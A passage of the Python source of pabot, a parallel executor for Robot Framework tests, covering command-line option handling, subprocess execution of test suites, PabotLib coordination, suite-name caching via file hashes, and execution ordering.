How many parallel executors to use (default max of 2 and cpu count)
--testlevelsplit
Split execution on test level instead of default suite level.
If .pabotsuitenames contains both tests and suites then this
will only affect new suites and split only them.
Leaving this flag out when both suites and tests in
.pabotsuitenames file will also only affect new suites and
add them as suite files.
--resourcefile [FILEPATH]
Indicator for a file that can contain shared variables for
distributing resources.
--pabotlib
Start PabotLib remote server. This enables locking and resource
distribution between parallel test executions.
--pabotlibhost [HOSTNAME]
Host name of the PabotLib remote server (default is 127.0.0.1)
--pabotlibport [PORT]
Port number of the PabotLib remote server (default is 8270)
--ordering [FILE PATH]
Optionally give execution order from a file.
--suitesfrom [FILEPATH TO OUTPUTXML]
Optionally read suites from output.xml file. Failed suites will run
first and longer running ones will be executed before shorter ones.
--argumentfile[INTEGER] [FILEPATH]
Run same suite with multiple argumentfile options.
For example "--argumentfile1 arg1.txt --argumentfile2 arg2.txt".
Copyright 2019 Mikko Korpela - Apache 2 License
"""
from __future__ import absolute_import, print_function
import os
import hashlib
import re
import sys
import time
import datetime
import uuid
import random
import traceback
from glob import glob
from io import BytesIO, StringIO
from collections import namedtuple
import shutil
import subprocess
import threading
from robot import rebot
from robot import __version__ as ROBOT_VERSION
from robot.api import ExecutionResult
from robot.conf import RobotSettings
from robot.errors import Information, DataError
from robot.model import ModelModifier
from robot.result.visitor import ResultVisitor
from robot.running import TestSuiteBuilder
from robot.libraries.Remote import Remote
from multiprocessing.pool import ThreadPool
from robot.run import USAGE
from robot.utils import ArgumentParser, SYSTEM_ENCODING, is_unicode, PY2
import signal
from . import pabotlib
from .result_merger import merge
from .clientwrapper import make_order
from .arguments import parse_args, parse_execution_item_line
from .execution_items import (
ExecutionItem,
HivedItem,
GroupItem,
SuiteItem,
TestItem,
DynamicSuiteItem,
GroupStartItem,
GroupEndItem,
SuiteItems,
)
try:
import queue # type: ignore
except ImportError:
import Queue as queue # type: ignore
try:
from shlex import quote # type: ignore
except ImportError:
from pipes import quote # type: ignore
from typing import List, Optional, Union, Dict, Tuple, IO, Any
CTRL_C_PRESSED = False
MESSAGE_QUEUE = queue.Queue()
EXECUTION_POOL_IDS = [] # type: List[int]
EXECUTION_POOL_ID_LOCK = threading.Lock()
POPEN_LOCK = threading.Lock()
_PABOTLIBURI = "127.0.0.1:8270"
_PABOTLIBPROCESS = None # type: Optional[subprocess.Popen]
_BOURNELIKE_SHELL_BAD_CHARS_WITHOUT_DQUOTE = (
"!#$^&*?[(){}<>~;'`\\|= \t\n" # does not contain '"'
)
_BAD_CHARS_SET = set(_BOURNELIKE_SHELL_BAD_CHARS_WITHOUT_DQUOTE)
_NUMBER_OF_ITEMS_TO_BE_EXECUTED = 0
_ABNORMAL_EXIT_HAPPENED = False
_COMPLETED_LOCK = threading.Lock()
_NOT_COMPLETED_INDEXES = [] # type: List[int]
_ROBOT_EXTENSIONS = [
".html",
".htm",
".xhtml",
".tsv",
".rst",
".rest",
".txt",
".robot",
]
_ALL_ELAPSED = [] # type: List[Union[int, float]]
class Color:
SUPPORTED_OSES = ["posix"]
GREEN = "\033[92m"
RED = "\033[91m"
ENDC = "\033[0m"
YELLOW = "\033[93m"
def _mapOptionalQuote(command_args):
# type: (List[str]) -> List[str]
if os.name == "posix":
return [quote(arg) for arg in command_args]
return [
arg if set(arg).isdisjoint(_BAD_CHARS_SET) else '"%s"' % arg
for arg in command_args
]
def execute_and_wait_with(item):
# type: ('QueueItem') -> None
global CTRL_C_PRESSED, _NUMBER_OF_ITEMS_TO_BE_EXECUTED
is_last = _NUMBER_OF_ITEMS_TO_BE_EXECUTED == 1
_NUMBER_OF_ITEMS_TO_BE_EXECUTED -= 1
if CTRL_C_PRESSED:
# Keyboard interrupt has happened!
return
time.sleep(0)
try:
datasources = [
d.encode("utf-8") if PY2 and is_unicode(d) else d for d in item.datasources
]
caller_id = uuid.uuid4().hex
name = item.display_name
outs_dir = os.path.join(item.outs_dir, item.argfile_index, str(item.index))
os.makedirs(outs_dir)
cmd = _create_command_for_execution(
caller_id, datasources, is_last, item, outs_dir
)
if item.hive:
_hived_execute(
item.hive,
cmd,
outs_dir,
name,
item.verbose,
_make_id(),
caller_id,
item.index,
)
else:
_try_execute_and_wait(
cmd,
outs_dir,
name,
item.verbose,
_make_id(),
caller_id,
item.index,
item.execution_item.type != "test",
)
outputxml_preprocessing(
item.options, outs_dir, name, item.verbose, _make_id(), caller_id
)
except:
_write(traceback.format_exc())
def _create_command_for_execution(caller_id, datasources, is_last, item, outs_dir):
cmd = (
item.command
+ _options_for_custom_executor(
item.options,
outs_dir,
item.execution_item,
item.argfile,
caller_id,
is_last,
item.index,
item.last_level,
item.processes,
)
+ datasources
)
return _mapOptionalQuote(cmd)
def _pabotlib_in_use():
return _PABOTLIBPROCESS or _PABOTLIBURI != "127.0.0.1:8270"
def _hived_execute(
hive, cmd, outs_dir, item_name, verbose, pool_id, caller_id, my_index=-1
):
plib = None
if _pabotlib_in_use():
plib = Remote(_PABOTLIBURI)
try:
make_order(hive, " ".join(cmd), outs_dir)
except:
_write(traceback.format_exc())
if plib:
_increase_completed(plib, my_index)
def _try_execute_and_wait(
cmd,
outs_dir,
item_name,
verbose,
pool_id,
caller_id,
my_index=-1,
show_stdout_on_failure=False,
):
# type: (List[str], str, str, bool, int, str, int, bool) -> None
plib = None
is_ignored = False
if _pabotlib_in_use():
plib = Remote(_PABOTLIBURI)
try:
with open(os.path.join(outs_dir, cmd[0] + "_stdout.out"), "w") as stdout:
with open(os.path.join(outs_dir, cmd[0] + "_stderr.out"), "w") as stderr:
process, (rc, elapsed) = _run(
cmd, stderr, stdout, item_name, verbose, pool_id, my_index
)
except:
_write(traceback.format_exc())
if plib:
_increase_completed(plib, my_index)
is_ignored = _is_ignored(plib, caller_id)
if is_ignored and os.path.isdir(outs_dir):
shutil.rmtree(outs_dir)
# Thread-safe list append
_ALL_ELAPSED.append(elapsed)
_result_to_stdout(
elapsed,
is_ignored,
item_name,
my_index,
pool_id,
process,
rc,
stderr,
stdout,
verbose,
show_stdout_on_failure,
)
def _result_to_stdout(
elapsed,
is_ignored,
item_name,
my_index,
pool_id,
process,
rc,
stderr,
stdout,
verbose,
show_stdout_on_failure,
):
if is_ignored:
_write_with_id(
process,
pool_id,
my_index,
_execution_ignored_message(item_name, stdout, stderr, elapsed, verbose),
)
elif rc != 0:
_write_with_id(
process,
pool_id,
my_index,
_execution_failed_message(
item_name, stdout, stderr, rc, verbose or show_stdout_on_failure
),
Color.RED,
)
else:
_write_with_id(
process,
pool_id,
my_index,
_execution_passed_message(item_name, stdout, stderr, elapsed, verbose),
Color.GREEN,
)
def _is_ignored(plib, caller_id): # type: (Remote, str) -> bool
return plib.run_keyword("is_ignored_execution", [caller_id], {})
# optionally invoke rebot for output.xml preprocessing to get --RemoveKeywords
# and --flattenkeywords applied => result: much smaller output.xml files + faster merging + avoid MemoryErrors
def outputxml_preprocessing(options, outs_dir, item_name, verbose, pool_id, caller_id):
# type: (Dict[str, Any], str, str, bool, int, str) -> None
try:
remove_keywords = options["removekeywords"]
flatten_keywords = options["flattenkeywords"]
if not remove_keywords and not flatten_keywords:
# => no preprocessing needed if no removekeywords or flattenkeywords present
return
remove_keywords_args = [] # type: List[str]
flatten_keywords_args = [] # type: List[str]
for k in remove_keywords:
remove_keywords_args += ["--removekeywords", k]
for k in flatten_keywords:
flatten_keywords_args += ["--flattenkeywords", k]
outputxmlfile = os.path.join(outs_dir, "output.xml")
oldsize = os.path.getsize(outputxmlfile)
cmd = (
[
"rebot",
"--log",
"NONE",
"--report",
"NONE",
"--xunit",
"NONE",
"--consolecolors",
"off",
"--NoStatusRC",
]
+ remove_keywords_args
+ flatten_keywords_args
+ ["--output", outputxmlfile, outputxmlfile]
)
cmd = _mapOptionalQuote(cmd)
_try_execute_and_wait(
cmd,
outs_dir,
"preprocessing output.xml on " + item_name,
verbose,
pool_id,
caller_id,
)
newsize = os.path.getsize(outputxmlfile)
perc = 100 * newsize / oldsize
if verbose:
_write(
"%s [main] [%s] Filesize reduced from %s to %s (%0.2f%%) for file %s"
% (
datetime.datetime.now(),
pool_id,
oldsize,
newsize,
perc,
outputxmlfile,
)
)
except:
print(sys.exc_info())
def _write_with_id(process, pool_id, item_index, message, color=None, timestamp=None):
timestamp = timestamp or datetime.datetime.now()
_write(
"%s [PID:%s] [%s] [ID:%s] %s"
% (timestamp, process.pid, pool_id, item_index, message),
color,
)
def _make_id(): # type: () -> int
global EXECUTION_POOL_IDS, EXECUTION_POOL_ID_LOCK
thread_id = threading.current_thread().ident
assert thread_id is not None
with EXECUTION_POOL_ID_LOCK:
if thread_id not in EXECUTION_POOL_IDS:
EXECUTION_POOL_IDS += [thread_id]
return EXECUTION_POOL_IDS.index(thread_id)
def _increase_completed(plib, my_index):
# type: (Remote, int) -> None
global _COMPLETED_LOCK, _NOT_COMPLETED_INDEXES
with _COMPLETED_LOCK:
if my_index not in _NOT_COMPLETED_INDEXES:
return
_NOT_COMPLETED_INDEXES.remove(my_index)
if _NOT_COMPLETED_INDEXES:
plib.run_keyword(
"set_parallel_value_for_key",
[
pabotlib.PABOT_MIN_QUEUE_INDEX_EXECUTING_PARALLEL_VALUE,
_NOT_COMPLETED_INDEXES[0],
],
{},
)
if len(_NOT_COMPLETED_INDEXES) == 1:
plib.run_keyword(
"set_parallel_value_for_key", ["pabot_only_last_executing", 1], {}
)
def _run(command, stderr, stdout, item_name, verbose, pool_id, item_index):
# type: (List[str], IO[Any], IO[Any], str, bool, int, int) -> Tuple[Union[subprocess.Popen[bytes], subprocess.Popen], Tuple[int, float]]
timestamp = datetime.datetime.now()
cmd = " ".join(command)
if PY2:
cmd = cmd.decode("utf-8").encode(SYSTEM_ENCODING)
# avoid hitting https://bugs.python.org/issue10394
with POPEN_LOCK:
process = subprocess.Popen(cmd, shell=True, stderr=stderr, stdout=stdout)
if verbose:
_write_with_id(
process,
pool_id,
item_index,
"EXECUTING PARALLEL %s with command:\n%s" % (item_name, cmd),
timestamp=timestamp,
)
else:
_write_with_id(
process,
pool_id,
item_index,
"EXECUTING %s" % item_name,
timestamp=timestamp,
)
return process, _wait_for_return_code(process, item_name, pool_id, item_index)
def _wait_for_return_code(process, item_name, pool_id, item_index):
rc = None
elapsed = 0
ping_time = ping_interval = 150
while rc is None:
rc = process.poll()
time.sleep(0.1)
elapsed += 1
if elapsed == ping_time:
ping_interval += 50
ping_time += ping_interval
_write_with_id(
process,
pool_id,
item_index,
"still running %s after %s seconds" % (item_name, elapsed / 10.0),
)
return rc, elapsed / 10.0
def _read_file(file_handle):
try:
with open(file_handle.name, "r") as content_file:
content = content_file.read()
return content
except:
return "Unable to read file %s" % file_handle
def _execution_failed_message(suite_name, stdout, stderr, rc, verbose):
if not verbose:
return "FAILED %s" % suite_name
return "Execution failed in %s with %d failing test(s)\n%s\n%s" % (
suite_name,
rc,
_read_file(stdout),
_read_file(stderr),
)
def _execution_passed_message(suite_name, stdout, stderr, elapsed, verbose):
if not verbose:
return "PASSED %s in %s seconds" % (suite_name, elapsed)
return "PASSED %s in %s seconds\n%s\n%s" % (
suite_name,
elapsed,
_read_file(stdout),
_read_file(stderr),
)
def _execution_ignored_message(suite_name, stdout, stderr, elapsed, verbose):
if not verbose:
return "IGNORED %s" % suite_name
return "IGNORED %s in %s seconds\n%s\n%s" % (
suite_name,
elapsed,
_read_file(stdout),
_read_file(stderr),
)
def _options_for_custom_executor(*args):
# type: (Any) -> List[str]
return _options_to_cli_arguments(_options_for_executor(*args))
def _options_for_executor(
options,
outs_dir,
execution_item,
argfile,
caller_id,
is_last,
queueIndex,
last_level,
processes,
):
options = options.copy()
options["log"] = "NONE"
options["report"] = "NONE"
options["xunit"] = "NONE"
options["test"] = options.get("test", [])[:]
options["suite"] = options.get("suite", [])[:]
execution_item.modify_options_for_executor(options)
options["outputdir"] = "%OUTPUTDIR%" if execution_item.type == "hived" else outs_dir
options["variable"] = options.get("variable", [])[:]
options["variable"].append("CALLER_ID:%s" % caller_id)
pabotLibURIVar = "PABOTLIBURI:%s" % _PABOTLIBURI
# Prevent multiple appending of PABOTLIBURI variable setting
if pabotLibURIVar not in options["variable"]:
options["variable"].append(pabotLibURIVar)
pabotExecutionPoolId = "PABOTEXECUTIONPOOLID:%d" % _make_id()
if pabotExecutionPoolId not in options["variable"]:
options["variable"].append(pabotExecutionPoolId)
pabotIsLast = "PABOTISLASTEXECUTIONINPOOL:%s" % ("1" if is_last else "0")
if pabotIsLast not in options["variable"]:
options["variable"].append(pabotIsLast)
pabotProcesses = "PABOTNUMBEROFPROCESSES:%s" % str(processes)
if pabotProcesses not in options["variable"]:
options["variable"].append(pabotProcesses)
pabotIndex = pabotlib.PABOT_QUEUE_INDEX + ":" + str(queueIndex)
if pabotIndex not in options["variable"]:
options["variable"].append(pabotIndex)
if last_level is not None:
pabotLastLevel = pabotlib.PABOT_LAST_LEVEL + ":" + str(last_level)
if pabotLastLevel not in options["variable"]:
options["variable"].append(pabotLastLevel)
if argfile:
_modify_options_for_argfile_use(argfile, options, execution_item.top_name())
options["argumentfile"] = argfile
return _set_terminal_coloring_options(options)
def _modify_options_for_argfile_use(argfile, options, root_name):
argfile_opts, _ = ArgumentParser(
USAGE,
auto_pythonpath=False,
auto_argumentfile=True,
env_options="ROBOT_OPTIONS",
).parse_args(["--argumentfile", argfile])
old_name = options.get("name", root_name)
if argfile_opts["name"]:
new_name = argfile_opts["name"]
_replace_base_name(new_name, old_name, options, "suite")
if not options["suite"]:
_replace_base_name(new_name, old_name, options, "test")
if "name" in options:
del options["name"]
def _replace_base_name(new_name, old_name, options, key):
if isinstance(options.get(key, None), str):
options[key] = new_name + options[key][len(old_name) :]
elif key in options:
options[key] = [new_name + s[len(old_name) :] for s in options.get(key, [])]
def _set_terminal_coloring_options(options):
if ROBOT_VERSION >= "2.9":
options["consolecolors"] = "off"
options["consolemarkers"] = "off"
else:
options["monitorcolors"] = "off"
if ROBOT_VERSION >= "2.8" and ROBOT_VERSION < "2.9":
options["monitormarkers"] = "off"
return options
def _options_to_cli_arguments(opts): # type: (dict) -> List[str]
res = [] # type: List[str]
for k, v in opts.items():
if isinstance(v, str):
res += ["--" + str(k), str(v)]
elif PY2 and is_unicode(v):
res += ["--" + str(k), v.encode("utf-8")]
elif isinstance(v, bool) and (v is True):
res += ["--" + str(k)]
elif isinstance(v, list):
for value in v:
if PY2 and is_unicode(value):
res += ["--" + str(k), value.encode("utf-8")]
else:
res += ["--" + str(k), str(value)]
return res
def _group_by_groups(tokens):
result = []
group = None
for token in tokens:
if isinstance(token, GroupStartItem):
if group is not None:
raise DataError(
"Ordering: Group can not contain a group. Encoutered '{'"
)
group = GroupItem()
result.append(group)
continue
if isinstance(token, GroupEndItem):
if group is None:
raise DataError(
"Ordering: Group end tag '}' encountered before start '{'"
)
group = None
continue
if group is not None:
group.add(token)
else:
result.append(token)
return result
def hash_directory(digest, path):
if os.path.isfile(path):
digest.update(_digest(_norm_path(path)))
get_hash_of_file(path, digest)
return
for root, _, files in os.walk(path):
for name in sorted(files):
file_path = os.path.join(root, name)
if os.path.isfile(file_path) and any(
file_path.endswith(p) for p in _ROBOT_EXTENSIONS
):
# DO NOT ALLOW CHANGE TO FILE LOCATION
digest.update(_digest(_norm_path(root)))
# DO THESE IN TWO PHASES BECAUSE SEPARATOR DIFFERS IN DIFFERENT OS
digest.update(_digest(name))
get_hash_of_file(file_path, digest)
def _norm_path(path):
return "/".join(os.path.normpath(path).split(os.path.sep))
def _digest(text):
text = text.decode("utf-8") if PY2 and not is_unicode(text) else text
return hashlib.sha1(text.encode("utf-8")).digest()
def get_hash_of_file(filename, digest):
if not os.path.isfile(filename):
return
with open(filename, "rb") as f_obj:
while True:
buf = f_obj.read(1024 * 1024)
if not buf:
break
digest.update(buf)
def get_hash_of_dirs(directories):
digest = hashlib.sha1()
for directory in directories:
hash_directory(digest, directory)
return digest.hexdigest()
IGNORED_OPTIONS = [
"pythonpath",
"outputdir",
"output",
"log",
"report",
"removekeywords",
"flattenkeywords",
"tagstatinclude",
"tagstatexclude",
"tagstatcombine",
"critical",
"noncritical",
"tagstatlink",
"metadata",
"tagdoc",
]
def get_hash_of_command(options, pabot_args):
digest = hashlib.sha1()
hopts = dict(options)
for option in options:
if option in IGNORED_OPTIONS or options[option] == []:
del hopts[option]
if pabot_args.get("testlevelsplit"):
hopts["testlevelsplit"] = True
digest.update(repr(sorted(hopts.items())).encode("utf-8"))
return digest.hexdigest()
Hashes = namedtuple("Hashes", ["dirs", "cmd", "suitesfrom"])
def _suitesfrom_hash(pabot_args):
if "suitesfrom" in pabot_args:
digest = hashlib.sha1()
get_hash_of_file(pabot_args["suitesfrom"], digest)
return digest.hexdigest()
else:
return "no-suites-from-option"
if PY2:
def _open_pabotsuitenames(mode):
return open(".pabotsuitenames", mode)
else:
def _open_pabotsuitenames(mode):
return open(".pabotsuitenames", mode, encoding="utf-8")
def solve_suite_names(outs_dir, datasources, options, pabot_args):
h = Hashes(
dirs=get_hash_of_dirs(datasources),
cmd=get_hash_of_command(options, pabot_args),
suitesfrom=_suitesfrom_hash(pabot_args),
)
try:
if not os.path.isfile(".pabotsuitenames"):
suite_names = generate_suite_names(
outs_dir, datasources, options, pabot_args
)
store_suite_names(h, suite_names)
return suite_names
with _open_pabotsuitenames("r") as suitenamesfile:
lines = [line.strip() for line in suitenamesfile.readlines()]
corrupted = len(lines) < 5
file_h = None # type: Optional[Hashes]
file_hash = None # type: Optional[str]
hash_of_file = None # type: Optional[str]
if not corrupted:
file_h = Hashes(
dirs=lines[0][len("datasources:") :],
cmd=lines[1][len("commandlineoptions:") :],
suitesfrom=lines[2][len("suitesfrom:") :],
)
file_hash = lines[3][len("file:") :]
hash_of_file = _file_hash(lines)
corrupted = corrupted or any(
not l.startswith("--suite ")
and not l.startswith("--test ")
and l != "#WAIT"
and l != "{"
and l != "}"
for l in lines[4:]
)
execution_item_lines = [parse_execution_item_line(l) for l in lines[4:]]
if corrupted or h != file_h or file_hash != hash_of_file:
return _regenerate(
file_h,
h,
pabot_args,
outs_dir,
datasources,
options,
execution_item_lines,
)
return execution_item_lines
except IOError:
return _levelsplit(
generate_suite_names_with_builder(outs_dir, datasources, options),
pabot_args,
)
def _levelsplit(
suites, pabot_args
): # type: (List[SuiteItem], Dict[str, str]) -> List[ExecutionItem]
if pabot_args.get("testlevelsplit"):
tests = [] # type: List[ExecutionItem]
for s in suites:
tests.extend(s.tests)
return tests
return list(suites)
def _group_by_wait(lines):
suites = [[]] # type: List[List[ExecutionItem]]
for suite in lines:
if not suite.isWait:
if suite:
suites[-1].append(suite)
else:
suites.append([])
return suites
def _regenerate(
file_h, h, pabot_args, outs_dir, datasources, options, lines
): # type: (Optional[Hashes], Hashes, Dict[str, str], str, List[str], Dict[str, str], List[ExecutionItem]) -> List[ExecutionItem]
assert all(isinstance(s, ExecutionItem) for s in lines)
if (
(file_h is None or file_h.suitesfrom != h.suitesfrom)
and "suitesfrom" in pabot_args
and os.path.isfile(pabot_args["suitesfrom"])
):
suites = _suites_from_outputxml(pabot_args["suitesfrom"])
if file_h is None or file_h.dirs != h.dirs:
all_suites = generate_suite_names_with_builder(
outs_dir, datasources, options
)
else:
all_suites = [suite for suite in lines if suite]
suites = _preserve_order(all_suites, suites)
else:
suites = _levelsplit(
generate_suite_names_with_builder(outs_dir, datasources, options),
pabot_args,
)
suites = _preserve_order(suites, [suite for suite in lines if suite])
if suites:
store_suite_names(h, suites)
assert all(isinstance(s, ExecutionItem) for s in suites)
return suites
def _contains_suite_and_test(suites):
return any(isinstance(s, SuiteItem) for s in suites) and any(
isinstance(t, TestItem) for t in suites
)
def _preserve_order(new_items, old_items):
assert all(isinstance(s, ExecutionItem) for s in new_items)
assert all(isinstance(s, ExecutionItem) for s in old_items)
old_contains_tests = any(isinstance(t, TestItem) for t in old_items)
old_contains_suites = any(isinstance(s, SuiteItem) for s in old_items)
old_items = _fix_items(old_items)
new_contains_tests = any(isinstance(t, TestItem) for t in new_items)
if old_contains_tests and old_contains_suites and not new_contains_tests:
new_items = _split_partially_to_tests(new_items, old_items)
# TODO: Preserving order when suites => tests OR tests => suites
preserve, ignorable = _get_preserve_and_ignore(
new_items, old_items, old_contains_tests and old_contains_suites
)
exists_in_old_and_new = [
s for s in old_items if (s in new_items and s not in ignorable) or s in preserve
]
exists_only_in_new = [
s for s in new_items if s not in old_items and s not in ignorable
]
return _fix_items(exists_in_old_and_new + exists_only_in_new)
def _fix_items(items): # type: (List[ExecutionItem]) -> List[ExecutionItem]
assert all(isinstance(s, ExecutionItem) for s in items)
to_be_removed = [] # type: List[int]
for i in range(len(items)):
for j in range(i + 1, len(items)):
if items[i].contains(items[j]):
to_be_removed.append(j)
items = [item for i, item in enumerate(items) if i not in to_be_removed]
result = [] # type: List[ExecutionItem]
to_be_splitted = {} # type: Dict[int, List[ExecutionItem]]
for i in range(len(items)):
if i in to_be_splitted:
result.extend(items[i].difference(to_be_splitted[i]))
else:
result.append(items[i])
for j in range(i + 1, len(items)):
if items[j].contains(items[i]):
if j not in to_be_splitted:
to_be_splitted[j] = []
to_be_splitted[j].append(items[i])
_remove_double_waits(result)
_remove_empty_groups(result)
if result and result[0].isWait:
result = result[1:]
if result and result[-1].isWait:
result = result[:-1]
return result
def _get_preserve_and_ignore(new_items, old_items, old_contains_suites_and_tests):
ignorable = []
preserve = []
for old_item in old_items:
for new_item in new_items:
if (
old_item.contains(new_item)
and new_item != old_item
and (isinstance(new_item, SuiteItem) or old_contains_suites_and_tests)
):
preserve.append(old_item)
ignorable.append(new_item)
if (
old_item.isWait
or isinstance(old_item, GroupStartItem)
or isinstance(old_item, GroupEndItem)
):
preserve.append(old_item)
preserve = [
new_item
for new_item in preserve
if not any([i.contains(new_item) and i != new_item for i in preserve])
]
return preserve, ignorable
def _remove_double_waits(exists_in_old_and_new): # type: (List[ExecutionItem]) -> None
doubles = []
for i, (j, k) in enumerate(zip(exists_in_old_and_new, exists_in_old_and_new[1:])):
if j.isWait and k == j:
doubles.append(i)
for i in reversed(doubles):
del exists_in_old_and_new[i]
def _remove_empty_groups(exists_in_old_and_new): # type: (List[ExecutionItem]) -> None
removables = []
for i, (j, k) in enumerate(zip(exists_in_old_and_new, exists_in_old_and_new[1:])):
if isinstance(j, GroupStartItem) and isinstance(k, GroupEndItem):
removables.extend([i, i + 1])
for i in reversed(removables):
del exists_in_old_and_new[i]
def _split_partially_to_tests(
new_suites, old_suites
): # type: (List[SuiteItem], List[ExecutionItem]) -> List[ExecutionItem]
suits = [] # type: List[ExecutionItem]
for s in new_suites:
split = False
for old_test in old_suites:
if isinstance(old_test, TestItem) and s.contains(old_test):
split = True
if split:
suits.extend(s.tests)
else:
suits.append(s)
return suits
def _file_hash(lines):
digest = hashlib.sha1()
digest.update(lines[0].encode())
digest.update(lines[1].encode())
digest.update(lines[2].encode())
hashes = 0
for line in lines[4:]:
if line not in ("#WAIT", "{", "}"):
line = line.decode("utf-8") if PY2 else line
hashes ^= int(hashlib.sha1(line.encode("utf-8")).hexdigest(), 16)
digest.update(str(hashes).encode())
return digest.hexdigest()
def store_suite_names(hashes, suite_names):
# type: (Hashes, List[ExecutionItem]) -> None
assert all(isinstance(s, ExecutionItem) for s in suite_names)
suite_lines = [s.line() for s in suite_names]
_write("Storing .pabotsuitenames file")
try:
with _open_pabotsuitenames("w") as suitenamesfile:
suitenamesfile.write("datasources:" + hashes.dirs + "\n")
suitenamesfile.write("commandlineoptions:" + hashes.cmd + "\n")
suitenamesfile.write("suitesfrom:" + hashes.suitesfrom + "\n")
suitenamesfile.write(
"file:"
+ _file_hash(
[
"datasources:" + hashes.dirs,
"commandlineoptions:" + hashes.cmd,
"suitesfrom:" + hashes.suitesfrom,
None,
]
+ suite_lines
)
+ "\n"
)
suitenamesfile.writelines(
(d + "\n").encode("utf-8") if PY2 and is_unicode(d) else d + "\n"
for d in suite_lines
)
except IOError:
_write(
"[ "
+ _wrap_with(Color.YELLOW, "WARNING")
+ " ]: storing .pabotsuitenames failed"
)
def generate_suite_names(
outs_dir, datasources, options, pabot_args
): # type: (object, object, object, Dict[str, str]) -> List[ExecutionItem]
suites = [] # type: List[SuiteItem]
if "suitesfrom" in pabot_args and os.path.isfile(pabot_args["suitesfrom"]):
suites = _suites_from_outputxml(pabot_args["suitesfrom"])
else:
suites = generate_suite_names_with_builder(outs_dir, datasources, options)
if pabot_args.get("testlevelsplit"):
tests = [] # type: List[ExecutionItem]
for s in suites:
tests.extend(s.tests)
return tests
return list(suites)
def generate_suite_names_with_builder(outs_dir, datasources, options):
opts = _options_for_dryrun(options, outs_dir)
settings = RobotSettings(opts)
builder = TestSuiteBuilder(
settings["SuiteNames"], settings.extension, rpa=settings.rpa
)
suite = builder.build(*datasources)
settings.rpa = builder.rpa
suite.configure(**settings.suite_config)
if settings.pre_run_modifiers:
_write.error = _write
suite.visit(
ModelModifier(settings.pre_run_modifiers, settings.run_empty_suite, _write)
)
all_suites = (
get_all_suites_from_main_suite(suite.suites) if suite.suites else [suite]
)
suite_names = [
SuiteItem(
suite.longname,
tests=[test.longname for test in suite.tests],
suites=suite.suites,
)
for suite in all_suites
]
if not suite_names and not options.get("runemptysuite", False):
stdout_value = opts["stdout"].getvalue()
if stdout_value:
_write(
"[STDOUT] from suite search:\n" + stdout_value + "[STDOUT] end",
Color.YELLOW,
)
stderr_value = opts["stderr"].getvalue()
if stderr_value:
_write(
"[STDERR] from suite search:\n" + stderr_value + "[STDERR] end",
Color.RED,
)
return list(sorted(set(suite_names)))
def get_all_suites_from_main_suite(suites):
all_suites = []
for suite in suites:
if suite.suites:
all_suites.extend(get_all_suites_from_main_suite(suite.suites))
else:
all_suites.append(suite)
return all_suites
class SuiteNotPassingsAndTimes(ResultVisitor):
def __init__(self):
self.suites = [] # type: List[Tuple[bool, int, str]]
def start_suite(self, suite):
if len(suite.tests) > 0:
self.suites.append((not suite.passed, suite.elapsedtime, suite.longname))
def _suites_from_outputxml(outputxml):
res = ExecutionResult(outputxml)
suite_times = SuiteNotPassingsAndTimes()
res.visit(suite_times)
return [SuiteItem(suite) for (_, _, suite) in reversed(sorted(suite_times.suites))]
def _options_for_dryrun(options, outs_dir):
options = options.copy()
options["log"] = "NONE"
options["report"] = "NONE"
options["xunit"] = "NONE"
options["variable"] = options.get("variable", [])[:]
options["variable"].append(pabotlib.PABOT_QUEUE_INDEX + ":-1")
if ROBOT_VERSION >= "2.8":
options["dryrun"] = True
else:
options["runmode"] = "DryRun"
options["output"] = "suite_names.xml"
# --timestampoutputs is not compatible with hard-coded suite_names.xml
options["timestampoutputs"] = False
options["outputdir"] = outs_dir
if PY2:
options["stdout"] = BytesIO()
options["stderr"] = BytesIO()
else:
options["stdout"] = StringIO()
options["stderr"] = StringIO()
options["listener"] = []
return _set_terminal_coloring_options(options)
def _options_for_rebot(options, start_time_string, end_time_string):
rebot_options = options.copy()
rebot_options["starttime"] = start_time_string
rebot_options["endtime"] = end_time_string
rebot_options["monitorcolors"] = "off"
rebot_options["suite"] = []
rebot_options["test"] = []
rebot_options["exclude"] = []
rebot_options["include"] = []
if ROBOT_VERSION >= "2.8":
options["monitormarkers"] = "off"
return rebot_options
def _now():
return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
def _print_elapsed(start, end):
_write(
"Total testing: "
+ _time_string(sum(_ALL_ELAPSED))
+ "\nElapsed time: "
+ _time_string(end - start)
)
def _time_string(elapsed):
millis = int((elapsed * 100) % 100)
seconds = int(elapsed) % 60
elapsed_minutes = (int(elapsed) - seconds) / 60
minutes = elapsed_minutes % 60
elapsed_hours = (elapsed_minutes - minutes) / 60
elapsed_string = ""
if elapsed_hours > 0:
plural = ""
if elapsed_hours > 1:
plural = "s"
elapsed_string += ("%d hour" % elapsed_hours) + plural + " "
if minutes > 0:
plural = ""
if minutes > 1:
plural = "s"
elapsed_string += ("%d minute" % minutes) + plural + " "
return elapsed_string + "%d.%d seconds" % (seconds, millis)
def keyboard_interrupt(*args):
global CTRL_C_PRESSED
CTRL_C_PRESSED = True
def _parallel_execute(items, processes):
original_signal_handler = signal.signal(signal.SIGINT, keyboard_interrupt)
pool = ThreadPool(processes)
result = pool.map_async(execute_and_wait_with, items, 1)
pool.close()
while not result.ready():
# keyboard interrupt is executed in main thread
# and needs this loop to get time to get executed
try:
time.sleep(0.1)
except IOError:
keyboard_interrupt()
signal.signal(signal.SIGINT, original_signal_handler)
def _output_dir(options, cleanup=True):
outputdir = options.get("outputdir", ".")
outpath = os.path.join(outputdir, "pabot_results")
if cleanup and os.path.isdir(outpath):
shutil.rmtree(outpath)
return outpath
def _copy_output_artifacts(options, file_extensions=None, include_subfolders=False):
file_extensions = file_extensions or ["png"]
pabot_outputdir = _output_dir(options, cleanup=False)
outputdir = options.get("outputdir", ".")
copied_artifacts = []
for location, _, file_names in os.walk(pabot_outputdir):
for file_name in file_names:
file_ext = file_name.split(".")[-1]
if file_ext in file_extensions:
rel_path = os.path.relpath(location, pabot_outputdir)
prefix = rel_path.split(os.sep)[0] # folders named "process-id"
dst_folder_path = outputdir
# if it is a file from sub-folders of "location"
if os.sep in rel_path:
if not include_subfolders:
continue
# create destination sub-folder
subfolder_path = rel_path[rel_path.index(os.sep) + 1 :]
dst_folder_path = os.path.join(outputdir, subfolder_path)
if not os.path.isdir(dst_folder_path):
os.makedirs(dst_folder_path)
dst_file_name = "-".join([prefix, file_name])
shutil.copyfile(
os.path.join(location, file_name),
os.path.join(dst_folder_path, dst_file_name),
)
copied_artifacts.append(file_name)
return copied_artifacts
def _report_results(outs_dir, pabot_args, options, start_time_string, tests_root_name):
stats = {
"critical": {"total": 0, "passed": 0, "failed": 0},
